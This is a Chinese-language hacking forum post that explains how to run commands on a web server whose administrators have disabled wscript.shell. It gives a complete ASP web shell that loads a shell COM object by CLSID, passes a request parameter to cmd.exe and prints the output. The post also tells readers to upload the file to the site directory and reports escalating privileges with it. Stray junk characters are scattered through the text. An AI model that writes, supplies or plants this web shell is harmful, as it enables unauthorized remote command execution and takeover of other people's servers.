可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。% j$ G, a( \( @( w6 k
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。* ?3 \7 T q. a9 _6 E( H
要想让运行命令可以试试这种方法,成功率为五五之数。
% x8 q7 E8 u' i$ l把下面代码复制:
" R& X. `, W; u, s: G<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>; d+ p5 ?* B& o3 a1 e% R
<%if err then%>8 d. J8 T" O) a1 g8 q& a
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object># H3 a( h, ?8 j. T/ q
<%3 s& K" l# S0 V% T9 a- O3 ~
end if
, a l( t% Y7 _4 N5 ?response.write("<textarea readonly cols=80 rows=20>")
7 I* c% R0 Z* ], o5 c1 Q9 yOn Error Resume Next( O# s4 ~1 C8 ]1 j
response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
( H3 @1 a" t' ]response.write("</textarea>")& d$ `+ Z0 U- Q) T
response.write("<form method='post'>")1 }* e) j g/ i' E' N) ]
response.write("<input type=text name='c' size=60><br>")
4 z: ~/ z( p1 `5 J7 l5 Zresponse.write("<input type=submit value='执行'></form>")
4 R+ P a% m$ s/ _( e; v0 C%>4 |2 d# G4 N$ I
) a: k$ }) f' s# T保存为一个asp文件,然后传到网站目录上去& m' j) D0 Q- A3 {/ r
运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
" s; D" i- ?$ u/ X( K7 |# @2 d6 ~我用此成功运行过cacls命令。2 S# S6 E1 z$ ~+ \1 H
1 p( w5 X' E& r第二那就是运行时出错,可能限制某些代码执行 |